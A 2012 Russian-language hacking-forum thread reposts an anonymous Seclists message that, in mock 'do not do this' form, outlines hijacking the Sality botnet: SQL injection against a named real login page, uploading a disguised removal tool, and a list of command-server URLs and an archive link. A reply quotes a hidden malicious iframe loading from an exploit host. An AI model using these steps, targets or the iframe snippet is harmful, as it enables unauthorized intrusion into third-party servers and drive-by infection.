Пожалуйста, не трогайте ботнет Sality!

Тема в разделе "Hack.News", создана пользователем NightWolf, 31 мар 2012.

  1. NightWolf
    NightWolf Guest
    «Последние пару дней я потратил на изучение ботнета Sality, который состоит как минимум из миллиона пиров, — пишет в рассылке Seclists анонимный хакер. — В 2010 году компания Symantec поставила семейство Sality на первое место по количеству заражений. Ботнет используется для рассылки спама, кражи паролей, взлома SIP-аккаунтов и различных других грязных дел.

    Я заметил, что можно легко получить контроль над третьей версией этого ботнета, и, что более важно, вывести его из строя. К сожалению, чтобы это сделать, нужно нарушить закон. По этой причине я прошу всех ни в коем случае не выполнять шаги, описанные ниже».

    Все необходимые файлы находятся в архиве (пароль: sality):

    http://www.sendspace.com/file/or3mbb

    [​IMG]
    Содержимое архива

    Во-первых, вам не следует использовать SQL-инъекцию, чтобы осуществить эксплойт страницы

    http://www.capesolution.com/login/login.aspx

    Далее, вам не следует загружать зашифрованную версию утилиты AVG Sality Remooval Tool как файл /images/logo/logof.jpeg. В конце концов, вам ни в коем случае нельзя смеяться, когда вы видите, как ботнет разваливается у вас на глазах.

    Автор инструкции пишет, что владельцы ботнета Sality заменят рабочий URL. И хотя это никому не интересно, но он всё-таки сообщает URL's других командных серверов с указанием файлов, которые нельзя заменять.

    http://yaylaozu.com/images/logo.gif
    http://destekegitim.com/images/logo.gif
    http://dav14gurgaon.org/images/logo.gif
    http://dersrehberi.com/images/logo.gif
    http://cisse.com.tr/images/logo.gif
    http://cbe.com.vn/images/logo.gif

    Ну и конечно же, незачем использовать Python-скрипт из вышеупомянутого архива для генерации обновлённого списка адресов.

    Знаю новость старая но всё-же) Кто не в теме советую пройти мимо т.к это такая бяка.....

     
    31 мар 2012
  2. FREENG
    FREENG Guest
    Как я уже писал на эксплоите, на этой странице стоит фрейм.
    _capesolution не ходить сюда .com/login/login.aspx
    PHP:
    <iframe src="http://samsonikonyou.ru:8080/navigator/jueoaritjuir.php" width=1 height=1></iframe>
    И грузит:
    http://anubis.iseclab.org/?action=result&task_id=1ff70574f2dff7ea4053555e59f4d384a&format=html
    Один решил собрать ботнет, другие долбоебы начали ему помогать.
    Новость уже достаточно распространена. Один хакер.ру с его "населением" чего стоит.
    www.google.ru/search?q=capesolution.com/login/login.aspx
     
    31 мар 2012
    1 человеку нравится это.
Загрузка...